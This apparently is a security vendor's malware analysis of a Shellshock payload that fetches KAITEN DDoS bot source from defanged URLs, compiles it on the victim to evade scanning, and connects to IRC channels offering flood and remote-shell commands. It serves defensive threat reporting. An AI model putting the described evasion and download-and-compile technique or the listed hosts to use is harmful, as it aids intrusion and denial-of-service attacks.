We found that one of the payloads of Bash vulnerabilities, which we detect as TROJ_BASHKAI.SM, downloaded the source code of KAITEN malware, which is used to carry out denial-of-service attacks. Based on our analysis, when TROJ_BASHKAI.SM is executed, it connects to the following malicious URLs:

http://www[dot]computer-services[dot]name/b[dot]c

http://stablehost[dot]us/bots/regular[dot]bot

When it connects to http://www[dot]computer-services[dot]name/b[dot]c, it downloads the KAITEN source code, which is then compiled using the common gcc compiler. This means that once connected to the URL, it won’t immediately download an executable file. Instead, it builds and compiles the source code, resulting in an executable file detected as ELF_KAITEN.SM.

The act of downloading and compiling on the infected system can be seen as a precautionary measure. Downloaded directly as an executable file, the ELF file may have compatibility issues with different Linux OS distributions. Compiling on the infected system ensures that the malware executes properly.

This routine could also be viewed as an evasion technique as some network security systems filter out non-executable files from scanning, due to network performance concerns. Systems configured this way may skip the scanning of the source code because it’s basically a text file. In addition, the recompilation of the source code can also have an effect of having differing binary files (which will have different hashes) across different Unix platforms. This will make detecting compiled binaries more difficult.

ELF_KAITEN.SM connects to an IRC server at x[dot]secureshellz[dot]net where it joins the IRC channel #pwn and waits for commands. Some of the commands the attackers issued are:

Perform UDP flood

Perform SYN flood

Download files

Send raw IRC command

Start remote shell

Perform PUCH-ACK flood

Disable, enable, terminate client

On the other hand, when it connects to http://stablehost[dot]us/bots/regular[dot]bot, it downloads three separate files. One of these is KAITEN source code, which is similarly compiled into ELF_KAITEN.A. This behaves similarly to ELF_KAITEN.SM, except it connects to linksys[dot]secureshellz[dot]net[colon]25 and to the channel #shellshock.

The second downloaded file is a Mac OS X malware detected OSX_KAITEN.A, which behaves similarly to ELF_KAITEN.A. The third file is a shellbot detected as PERL_SHELBOT.SMO. This is a powerful IRC-controlled shellbot that connects to the same server as the two previous files, but to a different channel (#scan). However, unlike KAITEN that doesn’t scan for vulnerable servers, PERL_SHELLBOT.SMO scans for vulnerable websites through various search engines.

Aside from downloading KAITEN and Shellbot, regular.bot (detected as TROJ_BASHKAI.SM) creates a file /tmp/c which is used to schedule the download a file from the second URL weekly. This ensures that the payload is up to date.

Figure 1. Screenshot of BASHKAI source code

Implications

KAITEN is old IRC-controlled DDoS malware and as such, there is a possibility that the attackers employed Shellshock to revive its old activities like DDoS attacks to target organizations. Another theory we have is that the attackers behind Shellshock would like to expand their infection chain to include DDoS activities via KAITEN malware.

Typically, systems infected with Shellshock payloads become a part of their botnet, and therefore can be used to launch DDoS attacks. In addition, the emergence of a downloaded file that targets Mac OS clearly show that attackers are broadening their target platform.

It was earlier reported that the “vast majority” of Mac OS X users are “safe by default” from Shellshock. However, users who configured to enable the Advanced Unix Services are still affected by this vulnerability. The Advanced Unix services enables remote access via Secure Shell (SSH) which offers ease of access to system or network administrators in managing their servers. This service is most likely enabled for machines used as servers such as web servers, which are the common targets Shellshock attacks.

Trend Micro is continuously monitoring the threat landscape for any developments regarding Shellshock. For more information about threats exploiting Shellshock, , you can refer to our summary post.

Security Predictions for 2020

Cybersecurity in 2020 will be viewed through many lenses — from differing attacker motivations and cybercriminal arsenal to technological developments and global threat intelligence — only so defenders can keep up with the broad range of threats.Read our security predictions for 2020.

Business Process Compromise

Attackers are starting to invest in long-term operations that target specific processes enterprises rely on. They scout for vulnerable practices, susceptible systems and operational loopholes that they can leverage or abuse. To learn more,
read our Security 101: Business Process Compromise.